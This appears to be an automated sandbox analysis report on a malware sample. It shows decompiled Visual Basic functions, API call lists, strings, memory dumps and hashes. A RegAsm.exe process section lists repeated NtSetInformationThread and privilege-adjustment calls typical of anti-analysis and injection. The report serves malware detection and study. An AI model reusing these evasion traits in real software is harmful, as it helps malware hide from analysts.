0x0040e87f
0x0040e88b
0x0040e890
0x0040e8b5
0x0040e8ba

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E7E6
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E7FE
__vbaNew2.MSVBVM60(0040A810,`os,?,?,?,?,004011F6), ref: 0040E81C
__vbaObjSet.MSVBVM60(?,00000000), ref: 0040E849
__vbaHresultCheckObj.MSVBVM60(00000000,?,0040B438,00000170), ref: 0040E87A
__vbaF.MSVBVM60 ref: 0040E88B
__vbaFreeVar.MSVBVM60(0040E8BB), ref: 0040E8B5

Strings

`os, xrefs: 0040E809, 0040E812, 0040E821, 0040E82A

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckChkstkFreeHresultNew2
String ID: `os
API String ID: 4127847336-2633975260
Opcode ID: e3b6e82becb9d85ed37842465f260feb38f5bba6c7e72e2b6bed411b5f8cde7c
Instruction ID: d32ea223251d1c98cb1ab50b60d826937bf3d830150fde743032ed823fa21fcd
Opcode Fuzzy Hash: e3b6e82becb9d85ed37842465f260feb38f5bba6c7e72e2b6bed411b5f8cde7c
Instruction Fuzzy Hash: 38210531900208EFCB04EFA2C845BDDBBB4BB08704F10886AF401BB2A1C7B85951DB59

Uniqueness

Uniqueness Score: -1.00%

Function 0040E3F9, Relevance: 13.6, APIs: 9, Instructions: 78
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040E3F9(void* __ebx, void* __edi, void* __esi, intOrPtr* _a4, void* _a12) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				void* _v40;
				char _v64;
				char _v80;
				intOrPtr _v104;
				intOrPtr _v112;
				intOrPtr _v120;
				char _v128;
				signed int _v132;
				short _v136;
				signed int _v148;
				signed int _v152;
				signed int _t46;
				short _t48;
				signed int _t51;
				void* _t62;
				void* _t64;
				intOrPtr _t65;

				_t65 = _t64 - 0xc;
				 *[fs:0x0] = _t65;
				L004011F0();
				_v16 = _t65;
				_v12 = 0x401180;
				_v8 = 0;
				 *((intOrPtr*)( *_a4 + 4))(_a4, __edi, __esi, __ebx,  *[fs:0x0], 0x4011f6, _t62);
				L004012D4();
				_v104 = 0x40b4e8;
				_v112 = 8;
				L004012D4();
				_push( &_v80);
				_t46 =  &_v64;
				_push(_t46);
				L004012AA();
				_v132 = _t46;
				if(_v132 >= 0) {
					_v148 = _v148 & 0x00000000;
				} else {
					_push(_v132);
					L004012A4();
					_v148 = _t46;
				}
				_v120 = 2;
				_v128 = 0x8002;
				_push( &_v80);
				_t48 =  &_v128;
				_push(_t48);
				L004012B0();
				_v136 = _t48;
				_push( &_v80);
				_push( &_v64);
				_push(2);
				L00401334();
				_t51 = _v136;
				if(_t51 != 0) {
					_t51 =  *((intOrPtr*)( *_a4 + 0x70c))(_a4);
					_v132 = _t51;
					if(_v132 >= 0) {
						_v152 = _v152 & 0x00000000;
					} else {
						_push(0x70c);
						_push(0x40b118);
						_push(_a4);
						_push(_v132);
						L004012EC();
						_v152 = _t51;
					}
				}
				_push(E0040E52D);
				L00401352();
				return _t51;
			}

0x0040e3fc
0x0040e40b
0x0040e417
0x0040e41f
0x0040e422
0x0040e429
0x0040e438
0x0040e441
0x0040e446
0x0040e44d
0x0040e45a
0x0040e462
0x0040e463
0x0040e466
0x0040e467
0x0040e46c
0x0040e473
0x0040e485
0x0040e475
0x0040e475
0x0040e478
0x0040e47d
0x0040e47d
0x0040e48c
0x0040e493
0x0040e49d
0x0040e49e
0x0040e4a1
0x0040e4a2
0x0040e4a7
0x0040e4b1
0x0040e4b5
0x0040e4b6
0x0040e4b8
0x0040e4c0
0x0040e4c9
0x0040e4d3
0x0040e4d9
0x0040e4e0
0x0040e4ff
0x0040e4e2
0x0040e4e2
0x0040e4e7
0x0040e4ec
0x0040e4ef
0x0040e4f2
0x0040e4f7
0x0040e4f7
0x0040e4e0
0x0040e506
0x0040e527
0x0040e52c

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E417
__vbaVarDup.MSVBVM60(?,?,?,?,004011F6), ref: 0040E441
__vbaVarDup.MSVBVM60 ref: 0040E45A
#564.MSVBVM60(?,?), ref: 0040E467
__vbaHresultCheck.MSVBVM60(00000000,?,?,?,?,?), ref: 0040E478
__vbaVarTstNe.MSVBVM60(00008002,?,?,?,?,?,?,?,?,?,?), ref: 0040E4A2
__vbaFreeVarList.MSVBVM60(00000002,?,?,00008002,?,?,?,?,?,?,?,?,?,?), ref: 0040E4B8
__vbaHresultCheckObj.MSVBVM60(00000000,00401180,0040B118,0000070C), ref: 0040E4F2
__vbaFreeVar.MSVBVM60(0040E52D,?,?,004011F6), ref: 0040E527

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$CheckFreeHresult$#564ChkstkList
String ID:
API String ID: 1402474909-0
Opcode ID: 0f04a6a845c068f8ac4b24445cbbc0caffac78b10ec48bc47eec1f378701ee4b
Instruction ID: 7516964a44ad601e0172e72c835d053dc3913f62f249249e4955c95f512b3f8c
Opcode Fuzzy Hash: 0f04a6a845c068f8ac4b24445cbbc0caffac78b10ec48bc47eec1f378701ee4b
Instruction Fuzzy Hash: 9631F771C00218ABDB10EFA5C945BDDBBB8BF08708F10856AF515BB1A1DB785A19CF58

Uniqueness

Uniqueness Score: -1.00%

Function 0040C0C6, Relevance: 12.3, APIs: 6, Strings: 1, Instructions: 17
COMMON

Download Yara Rule

C-Code - Quality: 47%

			E0040C0C6(void* __eax) {
				void* _t12;

				L0040135E();
				_push( *((intOrPtr*)(_t12 - 0x14)));
				_push(L"Lindormen");
				L004012F8();
				L0040135E();
				_push( *((intOrPtr*)(_t12 - 0x14)));
				_push(L"Lindormen");
				L004012F8();
				L0040135E();
				_push(E0040C107);
				L00401364();
				return __eax;
			}

0x0040c0c6
0x0040c0cb
0x0040c0ce
0x0040c0d3
0x0040c0dd
0x0040c0e2
0x0040c0e5
0x0040c0ea
0x0040c0f4
0x0040c0f9
0x0040c101
0x0040c106

APIs

__vbaStrMove.MSVBVM60 ref: 0040C0C6
#616.MSVBVM60(Lindormen,?), ref: 0040C0D3
__vbaStrMove.MSVBVM60(Lindormen,?), ref: 0040C0DD
#616.MSVBVM60(Lindormen,?,Lindormen,?), ref: 0040C0EA
__vbaStrMove.MSVBVM60(Lindormen,?,Lindormen,?), ref: 0040C0F4
__vbaFreeStr.MSVBVM60(0040C107,Lindormen,?,Lindormen,?), ref: 0040C101

Strings

Lindormen, xrefs: 0040C0CE, 0040C0E5

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Move$#616$Free
String ID: Lindormen
API String ID: 3784223357-1899767452
Opcode ID: f6e6be9a9cb26efb521af518cf369532760c6ddff5b2f891cf2eebc4e5822778
Instruction ID: c867624bc84bb4fb2a80d3c84c403bfbd8c87cc3649c90ba3df5f7d4d1b3768c
Opcode Fuzzy Hash: f6e6be9a9cb26efb521af518cf369532760c6ddff5b2f891cf2eebc4e5822778
Instruction Fuzzy Hash: B9D0EC32E0020A9ADB05B7E1C9429EEB322AF00704B70413FB512755F2DE7E1A02975D

Uniqueness

Uniqueness Score: -1.00%

Function 0040E364, Relevance: 7.5, APIs: 5, Instructions: 32
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E0040E364(void* __ebx, void* __ecx, void* __edi, void* __esi, void* _a20) {
				intOrPtr _v8;
				intOrPtr _v12;
				void* _v24;
				short _v36;
				intOrPtr _v44;
				char _v52;
				short _t13;
				intOrPtr _t24;

				_push(0x4011f6);
				_push( *[fs:0x0]);
				 *[fs:0x0] = _t24;
				_push(0x34);
				L004011F0();
				_v12 = _t24;
				_v8 = 0x401170;
				L00401322();
				_v44 = 0x80020004;
				_v52 = 0xa;
				_t13 =  &_v52;
				_push(_t13);
				L004012B6();
				_v36 = _t13;
				L00401352();
				_push(E0040E3D8);
				L00401364();
				return _t13;
			}

0x0040e369
0x0040e374
0x0040e375
0x0040e37c
0x0040e37f
0x0040e387
0x0040e38a
0x0040e397
0x0040e39c
0x0040e3a3
0x0040e3aa
0x0040e3ad
0x0040e3ae
0x0040e3b3
0x0040e3ba
0x0040e3bf
0x0040e3d2
0x0040e3d7

APIs

__vbaChkstk.MSVBVM60(?,004011F6), ref: 0040E37F
__vbaStrCopy.MSVBVM60(?,?,?,?,004011F6), ref: 0040E397
#648.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E3AE
__vbaFreeVar.MSVBVM60(0000000A,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E3BA
__vbaFreeStr.MSVBVM60(0040E3D8,0000000A,?,?,?,?,?,?,?,?,?,004011F6), ref: 0040E3D2

Memory Dump Source

Source File: 00000001.00000002.412382596.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000001.00000002.412365698.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000001.00000002.412421246.0000000000410000.00000004.00020000.sdmp Download File
Associated: 00000001.00000002.412427384.0000000000412000.00000002.00020000.sdmp Download File

Similarity

API ID: __vba$Free$#648ChkstkCopy
String ID:
API String ID: 1154470171-0
Opcode ID: 1639441c869e5d188091eb124a773a2e11c16c268b74b1b7bda145219a1b5980
Instruction ID: 2202024c4da992c368d9dce1da6ba8c71489493a8c5f47a22ff4a635cf1fd707
Opcode Fuzzy Hash: 1639441c869e5d188091eb124a773a2e11c16c268b74b1b7bda145219a1b5980
Instruction Fuzzy Hash: 90F04F70810308ABDB04EB92CD42F9EBB78FF04B44F50412EF501771A1D7786900C759

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: RegAsm.exe PID: 2916 Parent PID: 6820 RegAsm.exeCOMMON

Executed Functions

Function 00FA75B0, Relevance: 30.3, Strings: 21, Instructions: 4012COMMON

Download Yara Rule

Strings

X1kr, xrefs: 00FA8528
X1kr, xrefs: 00FA7AEC
X1kr, xrefs: 00FA78BF
X1kr, xrefs: 00FA84AB
X1kr, xrefs: 00FA80F6
X1kr, xrefs: 00FA8792
:@Dr, xrefs: 00FA7B55
X1kr, xrefs: 00FA86AD
X1kr, xrefs: 00FA79AB
X1kr, xrefs: 00FA8A2C
X1kr, xrefs: 00FA8A7B
X1kr, xrefs: 00FA78E3
X1kr, xrefs: 00FA85D9
X1kr, xrefs: 00FA8885
X1kr, xrefs: 00FA79F5
:@Dr, xrefs: 00FA8B03
X1kr, xrefs: 00FA8538
X1kr, xrefs: 00FA88AB
:@Dr, xrefs: 00FA7B70
X1kr, xrefs: 00FA87D4
X1kr, xrefs: 00FA8710

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: :@Dr$:@Dr$:@Dr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr
API String ID: 0-1510667432
Opcode ID: 92940998c65a64aa3909e1b8330013809508d541c2408154c657dd0afb1c7ec6
Instruction ID: b0905086b8836908bc6e3207b77492777a8ff0e50ff7fc97c8abca2d97edd29c
Opcode Fuzzy Hash: 92940998c65a64aa3909e1b8330013809508d541c2408154c657dd0afb1c7ec6
Instruction Fuzzy Hash: CC830875D00A299FDB65CF68C840B89BBF2BF89310F0580E6D90CAB261D771AE85DF41

Uniqueness

Uniqueness Score: -1.00%

Function 1F99ED18, Relevance: 23.6, APIs: 1, Strings: 12, Instructions: 829libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F99F46D

Strings

X1kr, xrefs: 1F99F672
X1kr, xrefs: 1F99F33A
X1kr, xrefs: 1F99F527
X1kr, xrefs: 1F99EDF6
X1kr, xrefs: 1F99F5EF
X1kr, xrefs: 1F99F390
X1kr, xrefs: 1F99F359
X1kr, xrefs: 1F99EE2E
X1kr, xrefs: 1F99F5C0
X1kr, xrefs: 1F99EE9A
X1kr, xrefs: 1F99F551
X1kr, xrefs: 1F99F3B6

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID: X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr
API String ID: 2994545307-2965069383
Opcode ID: 5368a88e75e68ed0beca4800f58a03c4239185bc01686abb3ae4b988fb75a6e5
Instruction ID: 28400a0d92cab660ab692668536a8f90c17f55c1febcda7aee1414c104109efc
Opcode Fuzzy Hash: 5368a88e75e68ed0beca4800f58a03c4239185bc01686abb3ae4b988fb75a6e5
Instruction Fuzzy Hash: 3E624C35E006298FDF55DF64C844BDEBBB6BF88300F1181A9D909AB2A1EB71AD45CF50

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1B00, Relevance: 21.0, Strings: 12, Instructions: 5963COMMON

Download Yara Rule

Strings

X1kr, xrefs: 00FA41F1
d, xrefs: 00FA34B2
X1kr, xrefs: 00FA62C4
X1kr, xrefs: 00FA62B8
X1kr, xrefs: 00FA1C27
X1kr, xrefs: 00FA543D
X1kr, xrefs: 00FA3530
._Ir, xrefs: 00FA58D4
X1kr, xrefs: 00FA1C92
X1kr, xrefs: 00FA4D25
d, xrefs: 00FA26A1
d, xrefs: 00FA2687

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: ._Ir$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$d$d$d
API String ID: 0-2718955631
Opcode ID: 61dc1136744e1870ce5f03250b72a74667eacad34331f106030cdadc5e597da6
Instruction ID: e2a9766440d030f9aa2955361ce2d297192099351be0637231b48be61e90fcb0
Opcode Fuzzy Hash: 61dc1136744e1870ce5f03250b72a74667eacad34331f106030cdadc5e597da6
Instruction Fuzzy Hash: E8C3A275D00A299FDB65CF68CC40ACAB7F2BF89310F0585E5E90CAB221D771AE859F41

Uniqueness

Uniqueness Score: -1.00%

Function 00FA1BD8, Relevance: 20.6, Strings: 12, Instructions: 5609COMMON

Download Yara Rule

Strings

X1kr, xrefs: 00FA41F1
d, xrefs: 00FA34B2
X1kr, xrefs: 00FA62C4
X1kr, xrefs: 00FA62B8
X1kr, xrefs: 00FA1C27
X1kr, xrefs: 00FA543D
X1kr, xrefs: 00FA3530
._Ir, xrefs: 00FA58D4
X1kr, xrefs: 00FA1C92
X1kr, xrefs: 00FA4D25
d, xrefs: 00FA26A1
d, xrefs: 00FA2687

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: ._Ir$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$d$d$d
API String ID: 0-2718955631
Opcode ID: fab0657c2a7329005050961e5e7a9b8083b7983aeb8b7cf229c71cf5d298e0dd
Instruction ID: b8c1b36fcc21420dde4738e868bbc06a378715ca79ea154f3daa52e04b9164ec
Opcode Fuzzy Hash: fab0657c2a7329005050961e5e7a9b8083b7983aeb8b7cf229c71cf5d298e0dd
Instruction Fuzzy Hash: F1B3B375D00A29AFDB65CF68CC40ACAB7F2BF89310F0585E5E50CAB221D771AE859F41

Uniqueness

Uniqueness Score: -1.00%

Function 00FAC9D3, Relevance: 14.4, Strings: 11, Instructions: 628COMMON

Download Yara Rule

Strings

X1kr, xrefs: 00FACB68
X1kr, xrefs: 00FACE08
X1kr, xrefs: 00FACC2D
X1kr, xrefs: 00FAC888
X1kr, xrefs: 00FACC7B
X1kr, xrefs: 00FACEBD
X1kr, xrefs: 00FAC8BF
X1kr, xrefs: 00FACEA0
X1kr, xrefs: 00FACB74
X1kr, xrefs: 00FACE6F
X1kr, xrefs: 00FACC5E

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr$X1kr
API String ID: 0-843520108
Opcode ID: 495c7c024ad11709b69bf51acbfdb20366aabd15e772a877cc76f4940a20ef30
Instruction ID: c89095160ca900c394fb543ab3857b27bc2f1214a1a07436213449c300996539
Opcode Fuzzy Hash: 495c7c024ad11709b69bf51acbfdb20366aabd15e772a877cc76f4940a20ef30
Instruction Fuzzy Hash: 07329170E00244CFEF24DBB8C494BADBBB2AF85314F25C46AD10AAF296DA75DC41DB51

Uniqueness

Uniqueness Score: -1.00%

Function 00FAE1A8, Relevance: 8.8, Strings: 6, Instructions: 1340COMMON

Download Yara Rule

Strings

,:kr, xrefs: 00FAE67B
X1kr, xrefs: 00FAEA92
X1kr, xrefs: 00FAEB73
X1kr, xrefs: 00FAEA36
X1kr, xrefs: 00FAE6B2
X1kr, xrefs: 00FAEAEE

Memory Dump Source

Source File: 00000006.00000002.597174409.0000000000FA0000.00000040.00000001.sdmp, Offset: 00FA0000, based on PE: false

Similarity

API ID:
String ID: ,:kr$X1kr$X1kr$X1kr$X1kr$X1kr
API String ID: 0-3598321688
Opcode ID: 2a3e1bd3a34a40254afbdc6e611322ed951ce687e377d9906cae79c1bcacdc7c
Instruction ID: 755e6be8222626393763e27f86b4afe9782ff8cd2abd2b34e12bb550297a1afb
Opcode Fuzzy Hash: 2a3e1bd3a34a40254afbdc6e611322ed951ce687e377d9906cae79c1bcacdc7c
Instruction Fuzzy Hash: 5A52A270F002049FDB24DBA9C894BAEBBF6EFDA310F258429D116DB391DA35EC419B51

Uniqueness

Uniqueness Score: -1.00%

Function 1F99DDB0, Relevance: 1.7, APIs: 1, Instructions: 188libraryCOMMON

Download Yara Rule

APIs

LdrInitializeThunk.NTDLL ref: 1F99DE65

Memory Dump Source

Source File: 00000006.00000002.602373531.000000001F990000.00000040.00000001.sdmp, Offset: 1F990000, based on PE: false

Similarity

API ID: InitializeThunk
String ID:
API String ID: 2994545307-0
Opcode ID: 867e4d1644deb889c2688dbb5a25fef6108ad23a7ec5063d16c248f56a4f4e99
Instruction ID: 10f2c5147ad609a85e294997de2c58a20bc74519deb5c4c4b295e791e156f463
Opcode Fuzzy Hash: 867e4d1644deb889c2688dbb5a25fef6108ad23a7ec5063d16c248f56a4f4e99
Instruction Fuzzy Hash: 30519630B043099FDB44ABB9C894AAEB7F6BF84304F15856AE505DB295EF34E805CB61

Uniqueness

Uniqueness Score: -1.00%

Function 00B0592A, Relevance: 1.6, APIs: 1, Instructions: 102nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 9f32b33442743de541783ad1350fdf560c4cb45e41efb6188d7af09c40af22f8
Instruction ID: 13b9a0b8dc788a40c3f289a1f2ed0462ab6cf83f80337d3fe04be86fd33ced6b
Opcode Fuzzy Hash: 9f32b33442743de541783ad1350fdf560c4cb45e41efb6188d7af09c40af22f8
Instruction Fuzzy Hash: 9631C120604E09DEEB385E24C5DC7A67EE2FF11364FE963EAC95286DE0D334C8848E51

Uniqueness

Uniqueness Score: -1.00%

Function 00B059BB, Relevance: 1.6, APIs: 1, Instructions: 79nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 67751eac7975f513e8eadf399f1f4f307ae61f686e14a9752378cdfec8b7c849
Instruction ID: 8867df0367ea7876afae554ea3ef23f575f7fc851a58bb6ce60a7657fa671704
Opcode Fuzzy Hash: 67751eac7975f513e8eadf399f1f4f307ae61f686e14a9752378cdfec8b7c849
Instruction Fuzzy Hash: 89218120605E09DEEB345E24C89C7A63EE1FF11364FE963EAC952469E1D334C8848F52

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CAF07, Relevance: 1.6, APIs: 1, Instructions: 75COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D5CAF87

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 03330895cc1818cdbbe8bd779b0b9e6fc7c6002cf3b2b5ad9effe5d2cdaeee7c
Instruction ID: 0b09874f583ad6552eb317a76f236c224f422d0ceaf7d9e970d7c8654430e4b9
Opcode Fuzzy Hash: 03330895cc1818cdbbe8bd779b0b9e6fc7c6002cf3b2b5ad9effe5d2cdaeee7c
Instruction Fuzzy Hash: 5421BFB5509384AFEB168F25DC44B52BFB8EF06210F0884DAE9898F163D2709908CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B05A0B, Relevance: 1.6, APIs: 1, Instructions: 70nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: d327bd2cc7a92957065f0d9874681689c24afed34886bbe1bd0436936d12d347
Instruction ID: df006fb483ff269ded20ebc11235bf9c413cf379e7bb2c9768878a6294aaecd3
Opcode Fuzzy Hash: d327bd2cc7a92957065f0d9874681689c24afed34886bbe1bd0436936d12d347
Instruction Fuzzy Hash: 38215420605A09DEEB355A24C59CBA63EE1FF11364FE963E6C85246CE1D374C8C4CE52

Uniqueness

Uniqueness Score: -1.00%

Function 00B05A7E, Relevance: 1.6, APIs: 1, Instructions: 64nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 70b27160b701bf7cb127702d8ff6a7c7a79de4eb28ff5cea3db9ff58fc493576
Instruction ID: ace252425da5224869fd5b9b13b96f4d37e2e0fe9ab9288938e770080e35018a
Opcode Fuzzy Hash: 70b27160b701bf7cb127702d8ff6a7c7a79de4eb28ff5cea3db9ff58fc493576
Instruction Fuzzy Hash: E6112120605B099DEB395A24C59C7A63FE1EF12374FE963E6C856468E1D374C8C8CF52

Uniqueness

Uniqueness Score: -1.00%

Function 00B05A96, Relevance: 1.6, APIs: 1, Instructions: 60nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 14c3dada22473c3070488213d9897edf604c25ddd686fa337e7253715c5a2b21
Instruction ID: c8e5ba8a80ca5d2ad3532b93399f078aba8e2fd42b256aa9af9f95dcb090fb85
Opcode Fuzzy Hash: 14c3dada22473c3070488213d9897edf604c25ddd686fa337e7253715c5a2b21
Instruction Fuzzy Hash: 41110020605B09EEEB395E24C59C7A67FE1EF11374FE963E6C852468E1D364C8C4CE52

Uniqueness

Uniqueness Score: -1.00%

Function 00B05ABA, Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 69971ebbd912b15357eda056a894494bf2ed97791c79375b86fb7ffc7c896706
Instruction ID: 972082244b2511f5c1368b00a9a4defefce0d1d19170d97a678f023ded4b42d5
Opcode Fuzzy Hash: 69971ebbd912b15357eda056a894494bf2ed97791c79375b86fb7ffc7c896706
Instruction Fuzzy Hash: E2111220515B099DEB355A24C59CBA63EE1EF11374FE962E6C851468E1D364C8C4CE51

Uniqueness

Uniqueness Score: -1.00%

Function 00B05AC5, Relevance: 1.6, APIs: 1, Instructions: 58nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: cbd290eafc6b5494303d5c509fbdf001649b9f28d017e064ae4a85ecaae723a2
Instruction ID: 9f7f9bc69415a296a44f3c7bd9048a4cde38689d365eb3d176db1cccad56285c
Opcode Fuzzy Hash: cbd290eafc6b5494303d5c509fbdf001649b9f28d017e064ae4a85ecaae723a2
Instruction Fuzzy Hash: 9D111C20615B099EEB395A24C49CBA67FE1EF12364FD962E6C846468E1D364C8C8CF52

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CB089, Relevance: 1.6, APIs: 1, Instructions: 57nativeCOMMON

Download Yara Rule

APIs

NtQuerySystemInformation.NTDLL ref: 1D5CB0F5

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: InformationQuerySystem
String ID:
API String ID: 3562636166-0
Opcode ID: af4fe675f13f1a7f50051673858cdb60faffc78635fea801022653da8b1958ea
Instruction ID: a0a62c67b848b128b41d35e4981cdce57b874f856f055d56b45dd7df3a49e86d
Opcode Fuzzy Hash: af4fe675f13f1a7f50051673858cdb60faffc78635fea801022653da8b1958ea
Instruction Fuzzy Hash: A41190724093C4AFD7128F14DC45A52FFB4EF06324F0984DAED888F163D275A918DB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B05AFB, Relevance: 1.6, APIs: 1, Instructions: 54nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 8e8a710571558830d2a1f016142b2e28c4fc124f1d6a4fb690bcd610d4b4f912
Instruction ID: 3db47d6cc3d7eb53069c3a8dee8410ce0c47f5f8efcda52915fdd1636f9d549c
Opcode Fuzzy Hash: 8e8a710571558830d2a1f016142b2e28c4fc124f1d6a4fb690bcd610d4b4f912
Instruction Fuzzy Hash: 5F111E20A15B09DDEB385E24C19CBA63FE1EF11374FD962E6C851868E1D334C8C8CE51

Uniqueness

Uniqueness Score: -1.00%

Function 1D5CAF3E, Relevance: 1.6, APIs: 1, Instructions: 52COMMON

Download Yara Rule

APIs

AdjustTokenPrivileges.KERNELBASE(?,?,?,?,?,?), ref: 1D5CAF87

Memory Dump Source

Source File: 00000006.00000002.601030038.000000001D5CA000.00000040.00000001.sdmp, Offset: 1D5CA000, based on PE: false

Similarity

API ID: AdjustPrivilegesToken
String ID:
API String ID: 2874748243-0
Opcode ID: 76ba29da5f7366fdd1c8ef05c1a8100f07a59593286b89e7dd1c83f6f6025e6e
Instruction ID: ff9aeb423be668a6dd1de0bd74c21106220d66c7a67529fe39eb219acf71fa02
Opcode Fuzzy Hash: 76ba29da5f7366fdd1c8ef05c1a8100f07a59593286b89e7dd1c83f6f6025e6e
Instruction Fuzzy Hash: 8E118C755007009FDB258F95D884B57FFE8EF04220F0888AAED498B616D271E418CB62

Uniqueness

Uniqueness Score: -1.00%

Function 00B05B82, Relevance: 1.6, APIs: 1, Instructions: 51nativethreadCOMMON

Download Yara Rule

APIs

NtSetInformationThread.NTDLL ref: 00B05CE0

Memory Dump Source

Source File: 00000006.00000002.596328627.0000000000B01000.00000040.00000001.sdmp, Offset: 00B01000, based on PE: false

Yara matches

Similarity

API ID: InformationThread
String ID:
API String ID: 4046476035-0
Opcode ID: 61002b8fd8bda21f9921bc8c827401f5dcec0c0eab2a0764de238ddef7f325ad
Instruction ID: 563c8c3b1a10d91f020fa19a1a1c16905ecf81ab98aa1b9d7b76005b5c3abcdd
Opcode Fuzzy Hash: 61002b8fd8bda21f9921bc8c827401f5dcec0c0eab2a0764de238ddef7f325ad
Instruction Fuzzy Hash: 59012D20605B09DDEB395E24C59CBA23FE1EF12364FD962E6C842478E1D335C8C8CE52

Uniqueness

